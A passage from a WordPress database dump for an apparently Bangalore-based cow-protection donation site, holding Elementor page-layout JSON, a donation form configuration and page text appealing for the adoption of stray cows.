/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11113,1847,'_elementor_page_assets','a:0:{}'),(11116,1850,'forminator_form_meta','a:6:{s:6:\"fields\";a:0:{}s:8:\"settings\";a:79:{s:8:\"formName\";s:8:\"donation\";s:17:\"pagination-header\";s:3:\"nav\";s:7:\"version\";s:6:\"1.18.2\";s:17:\"form-border-style\";s:4:\"none\";s:12:\"form-padding\";s:0:\"\";s:11:\"form-border\";s:0:\"\";s:12:\"fields-style\";s:4:\"open\";s:10:\"validation\";s:9:\"on_submit\";s:18:\"akismet-protection\";s:1:\"1\";s:10:\"form-style\";s:7:\"default\";s:11:\"enable-ajax\";s:4:\"true\";s:9:\"autoclose\";s:4:\"true\";s:20:\"submission-indicator\";s:4:\"show\";s:15:\"indicator-label\";s:13:\"Submitting...\";s:14:\"paginationData\";a:2:{s:24:\"pagination-header-design\";s:4:\"show\";s:17:\"pagination-header\";s:3:\"nav\";}s:9:\"form-type\";s:7:\"default\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:16:\"thankyou-message\";s:57:\"Thank you for contacting us, we will be in touch shortly.\";s:10:\"submitData\";a:2:{s:18:\"custom-submit-text\";s:12:\"Send Message\";s:27:\"custom-invalid-form-message\";s:53:\"Error: Your form is not valid, please fix the errors!\";}s:17:\"validation-inline\";s:1:\"1\";s:11:\"form-expire\";s:9:\"no_expire\";s:16:\"form-padding-top\";s:1:\"0\";s:18:\"form-padding-right\";s:1:\"0\";s:19:\"form-padding-bottom\";s:1:\"0\";s:17:\"form-padding-left\";s:1:\"0\";s:17:\"form-border-width\";s:1:\"0\";s:18:\"form-border-radius\";s:1:\"0\";s:23:\"cform-label-font-family\";s:6:\"Roboto\";s:25:\"cform-label-custom-family\";s:0:\"\";s:21:\"cform-label-font-size\";s:2:\"12\";s:23:\"cform-label-font-weight\";s:4:\"bold\";s:23:\"cform-title-font-family\";s:6:\"Roboto\";s:25:\"cform-title-custom-family\";s:0:\"\";s:21:\"cform-title-font-size\";s:2:\"45\";s:23:\"cform-title-font-weight\";s:6:\"normal\";s:22:\"cform-title-text-align\";s:4:\"left\";s:26:\"cform-subtitle-font-family\";s:6:\"Roboto\";s:26:\"cform-subtitle-custom-font\";s:0:\"\";s:24:\"cform-subtitle-font-size\";s:2:\"18\";s:26:\"cform-subtitle-font-weight\";s:6:\"normal\";s:25:\"cform-subtitle-text-align\";s:4:\"left\";s:23:\"cform-input-font-family\";s:6:\"Roboto\";s:23:\"cform-input-custom-font\";s:0:\"\";s:21:\"cform-input-font-size\";s:2:\"16\";s:23:\"cform-input-font-weight\";s:6:\"normal\";s:23:\"cform-radio-font-family\";s:6:\"Roboto\";s:23:\"cform-radio-custom-font\";s:0:\"\";s:21:\"cform-radio-font-size\";s:2:\"14\";s:23:\"cform-radio-font-weight\";s:6:\"normal\";s:24:\"cform-select-font-family\";s:6:\"Roboto\";s:26:\"cform-select-custom-family\";s:0:\"\";s:22:\"cform-select-font-size\";s:2:\"16\";s:24:\"cform-select-font-weight\";s:6:\"normal\";s:29:\"cform-multiselect-font-family\";s:6:\"Roboto\";s:29:\"cform-multiselect-custom-font\";s:0:\"\";s:27:\"cform-multiselect-font-size\";s:2:\"16\";s:29:\"cform-multiselect-font-weight\";s:6:\"normal\";s:26:\"cform-dropdown-font-family\";s:6:\"Roboto\";s:26:\"cform-dropdown-custom-font\";s:0:\"\";s:24:\"cform-dropdown-font-size\";s:2:\"16\";s:26:\"cform-dropdown-font-weight\";s:6:\"normal\";s:26:\"cform-calendar-font-family\";s:6:\"Roboto\";s:26:\"cform-calendar-custom-font\";s:0:\"\";s:24:\"cform-calendar-font-size\";s:2:\"13\";s:26:\"cform-calendar-font-weight\";s:6:\"normal\";s:24:\"cform-button-font-family\";s:6:\"Roboto\";s:24:\"cform-button-custom-font\";s:0:\"\";s:22:\"cform-button-font-size\";s:2:\"14\";s:24:\"cform-button-font-weight\";s:3:\"500\";s:26:\"cform-timeline-font-family\";s:6:\"Roboto\";s:26:\"cform-timeline-custom-font\";s:0:\"\";s:24:\"cform-timeline-font-size\";s:2:\"12\";s:26:\"cform-timeline-font-weight\";s:6:\"normal\";s:28:\"cform-pagination-font-family\";s:0:\"\";s:28:\"cform-pagination-custom-font\";s:0:\"\";s:26:\"cform-pagination-font-size\";s:2:\"16\";s:28:\"cform-pagination-font-weight\";s:6:\"normal\";s:19:\"payment_require_ssl\";s:0:\"\";s:15:\"submission-file\";s:6:\"delete\";}s:9:\"client_id\";N;s:22:\"integration_conditions\";a:0:{}s:9:\"behaviors\";a:1:{i:0;a:10:{s:4:\"slug\";s:18:\"behavior-1234-4567\";s:5:\"label\";s:0:\"\";s:14:\"autoclose-time\";i:5;s:9:\"autoclose\";s:4:\"true\";s:6:\"newtab\";s:7:\"sametab\";s:16:\"thankyou-message\";s:57:\"Thank you for contacting us, we will be in touch shortly.\";s:22:\"email-thankyou-message\";s:0:\"\";s:23:\"manual-thankyou-message\";s:0:\"\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:12:\"redirect-url\";s:0:\"\";}}s:13:\"notifications\";a:1:{i:0;a:8:{s:4:\"slug\";s:22:\"notification-1234-4567\";s:5:\"label\";s:11:\"Admin Email\";s:16:\"email-recipients\";s:7:\"default\";s:10:\"recipients\";s:19:\"mango@homedirect.in\";s:13:\"email-subject\";s:47:\"New Form Entry #{submission_id} for {form_name}\";s:12:\"email-editor\";s:111:\"You have a new website form submission: <br/> {all_fields} <br/>---<br/> This message was sent from {site_url}.\";s:16:\"email-attachment\";s:4:\"true\";s:4:\"type\";s:7:\"default\";}}}'),(11117,1851,'_tablepress_table_options','{\"last_editor\":1,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":false,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),(11118,1851,'_tablepress_table_visibility','{\"rows\":[1,1,1,1],\"columns\":[1,1,1,1]}'),(11128,1854,'_elementor_edit_mode','builder'),(11129,1854,'_elementor_template_type','wp-page'),(11130,1854,'_elementor_version','3.7.8'),(11131,1854,'_wp_page_template','elementor_canvas'),(11132,1854,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11133,1854,'_elementor_page_assets','a:0:{}'),(11135,1855,'_elementor_edit_mode','builder'),(11136,1855,'_elementor_template_type','wp-page'),(11137,1855,'_elementor_version','3.7.8'),(11138,1855,'_wp_page_template','elementor_canvas'),(11139,1855,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11140,1855,'_elementor_page_assets','a:0:{}'),(11142,1856,'_elementor_edit_mode','builder'),(11143,1856,'_elementor_template_type','wp-page'),(11144,1856,'_elementor_version','3.7.8'),(11145,1856,'_wp_page_template','elementor_canvas'),(11146,1856,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\